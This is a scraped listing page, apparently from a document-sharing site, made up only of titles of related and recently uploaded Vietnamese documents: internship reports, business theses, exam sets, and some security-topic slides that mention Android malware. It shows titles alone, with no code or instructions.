Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
คู่มือ Handbook app inventor
คู่มือ Handbook app inventorคู่มือ Handbook app inventor
คู่มือ Handbook app inventor
 
CƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAM
CƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAMCƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAM
CƠ CHẾ QUẢN LÝ VỐN TẬP TRUNG TẠI NGÂN HÀNG ĐẦU TƯ VÀ PHÁT TRIỂN VIỆT NAM
 
Đề tài: Xây dựng Website bán laptop (GoodLaptop), HAY
Đề tài: Xây dựng Website bán laptop (GoodLaptop), HAYĐề tài: Xây dựng Website bán laptop (GoodLaptop), HAY
Đề tài: Xây dựng Website bán laptop (GoodLaptop), HAY
 
Slide đồ án kiểm thử PM
Slide đồ án kiểm thử PMSlide đồ án kiểm thử PM
Slide đồ án kiểm thử PM
 
Chứng Từ Xuất Nhập Khẩu
Chứng Từ Xuất Nhập KhẩuChứng Từ Xuất Nhập Khẩu
Chứng Từ Xuất Nhập Khẩu
 
Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...
Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...
Đề tài: Cửa hàng kem tươi “ice-cream” Thương hiệu Kem Tổng hợp Thế giới - Wor...
 
Luận văn: Quản tri rủi ro tài chính tại các công ty xây dựng, HOT
Luận văn: Quản tri rủi ro tài chính tại các công ty xây dựng, HOTLuận văn: Quản tri rủi ro tài chính tại các công ty xây dựng, HOT
Luận văn: Quản tri rủi ro tài chính tại các công ty xây dựng, HOT
 
Hướng dẫn xây dựng ma trận trong quản trị chiến lược
Hướng dẫn xây dựng ma trận trong quản trị chiến lượcHướng dẫn xây dựng ma trận trong quản trị chiến lược
Hướng dẫn xây dựng ma trận trong quản trị chiến lược
 
Tối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tử
Tối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tửTối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tử
Tối ưu hoá công cụ tìm kiếm (SEO) cho báo điện tử
 
KrDAG 스터디: 라즈베리파이2와 Beacon의만남
KrDAG 스터디: 라즈베리파이2와 Beacon의만남KrDAG 스터디: 라즈베리파이2와 Beacon의만남
KrDAG 스터디: 라즈베리파이2와 Beacon의만남
 
Hadoop - Hệ thống tính toán và xử lý dữ liệu lớn
Hadoop - Hệ thống tính toán và xử lý dữ liệu lớnHadoop - Hệ thống tính toán và xử lý dữ liệu lớn
Hadoop - Hệ thống tính toán và xử lý dữ liệu lớn
 
DỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docx
DỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docxDỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docx
DỰ ÁN MỞ TIỆM BÁNH MISSU BARKEY.docx
 
CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...
CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...
CÁC CÂU HỎI CỦA KHÁCH DÀNH CHO FORWARDER (KHÁCH HÀNG HÀNG NHẬP)_ Advantage Lo...
 
Luận văn: Bảo mật thông tin trong hệ thống mạng cục bộ, HAY, 9đ
Luận văn: Bảo mật thông tin trong hệ thống mạng cục bộ, HAY, 9đLuận văn: Bảo mật thông tin trong hệ thống mạng cục bộ, HAY, 9đ
Luận văn: Bảo mật thông tin trong hệ thống mạng cục bộ, HAY, 9đ
 
Bao cao tttn an ninh web
Bao cao tttn   an ninh webBao cao tttn   an ninh web
Bao cao tttn an ninh web
 
Lập trình android
Lập trình androidLập trình android
Lập trình android
 
Phân tích swot của cty vinamilk
Phân tích swot của cty vinamilkPhân tích swot của cty vinamilk
Phân tích swot của cty vinamilk
 

Viewers also liked

BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1kakawpah0911
 
Psych 610 week 5 individual assignment homework exercise
Psych 610 week 5 individual assignment homework exercisePsych 610 week 5 individual assignment homework exercise
Psych 610 week 5 individual assignment homework exerciseicraltioclim1984
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5kakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4kakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
BÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲBÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲkakawpah0911
 
setting Dns linux debian
setting Dns linux debiansetting Dns linux debian
setting Dns linux debianArga Prahara
 
SLIDE BÁO CÁO THỰC TẬP
SLIDE BÁO CÁO THỰC TẬPSLIDE BÁO CÁO THỰC TẬP
SLIDE BÁO CÁO THỰC TẬPkakawpah0911
 
تصنيف ديوي العشري
تصنيف ديوي العشريتصنيف ديوي العشري
تصنيف ديوي العشريahmeddafi1385
 
Data discovery qlikview
Data discovery   qlikviewData discovery   qlikview
Data discovery qlikviewchoi3773
 

Viewers also liked (15)

BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Nov dic
Nov dicNov dic
Nov dic
 
Psych 610 week 5 individual assignment homework exercise
Psych 610 week 5 individual assignment homework exercisePsych 610 week 5 individual assignment homework exercise
Psych 610 week 5 individual assignment homework exercise
 
Tsunami
TsunamiTsunami
Tsunami
 
Wake up now
Wake up nowWake up now
Wake up now
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
BÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲBÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲ
 
Nasopure: Athlete presentation 2014
Nasopure: Athlete presentation 2014Nasopure: Athlete presentation 2014
Nasopure: Athlete presentation 2014
 
Ecosistemas GUE. JAE. 4 B
Ecosistemas GUE. JAE. 4 BEcosistemas GUE. JAE. 4 B
Ecosistemas GUE. JAE. 4 B
 
setting Dns linux debian
setting Dns linux debiansetting Dns linux debian
setting Dns linux debian
 
SLIDE BÁO CÁO THỰC TẬP
SLIDE BÁO CÁO THỰC TẬPSLIDE BÁO CÁO THỰC TẬP
SLIDE BÁO CÁO THỰC TẬP
 
تصنيف ديوي العشري
تصنيف ديوي العشريتصنيف ديوي العشري
تصنيف ديوي العشري
 
Data discovery qlikview
Data discovery   qlikviewData discovery   qlikview
Data discovery qlikview
 

Similar to BÁO CÁO THỰC TẬP - GIỮA KỲ

BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1phanconghien
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4Xuân Ngọc Nguyễn
 
Slide bao cao giua ki
Slide bao cao giua ki Slide bao cao giua ki
Slide bao cao giua ki thach28
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt GenmymotionTrọng An
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENAXuân Ngọc Nguyễn
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho androidthach28
 

Similar to BÁO CÁO THỰC TẬP - GIỮA KỲ (20)

BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
1
11
1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Bao cao
Bao caoBao cao
Bao cao
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Tuan5
Tuan5Tuan5
Tuan5
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Slide bao cao giua ki
Slide bao cao giua ki Slide bao cao giua ki
Slide bao cao giua ki
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho android
 

Recently uploaded

ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...Nguyen Thanh Tu Collection
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...Nguyen Thanh Tu Collection
 
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfhoangtuansinh1
 
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líKiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líDr K-OGN
 
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXHTư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXHThaoPhuong154017
 
Hệ phương trình tuyến tính và các ứng dụng trong kinh tế
Hệ phương trình tuyến tính và các ứng dụng trong kinh tếHệ phương trình tuyến tính và các ứng dụng trong kinh tế
Hệ phương trình tuyến tính và các ứng dụng trong kinh tếngTonH1
 
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxnhungdt08102004
 
Ma trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếMa trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếngTonH1
 
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhvanhathvc
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...Nguyen Thanh Tu Collection
 
Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...
Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...
Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...Học viện Kstudy
 
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoabài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa2353020138
 
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxChàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxendkay31
 
Sơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdfSơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdftohoanggiabao81
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...ThunTrn734461
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 

Recently uploaded (20)

ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
 
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
 
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líKiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
 
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXHTư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
 
Hệ phương trình tuyến tính và các ứng dụng trong kinh tế
Hệ phương trình tuyến tính và các ứng dụng trong kinh tếHệ phương trình tuyến tính và các ứng dụng trong kinh tế
Hệ phương trình tuyến tính và các ứng dụng trong kinh tế
 
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
 
Ma trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tếMa trận - định thức và các ứng dụng trong kinh tế
Ma trận - định thức và các ứng dụng trong kinh tế
 
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
 
Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...
Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...
Slide Webinar Hướng dẫn sử dụng ChatGPT cho người mới bắt đầ...
 
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoabài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
 
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxChàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
 
Sơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdfSơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdf
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
 
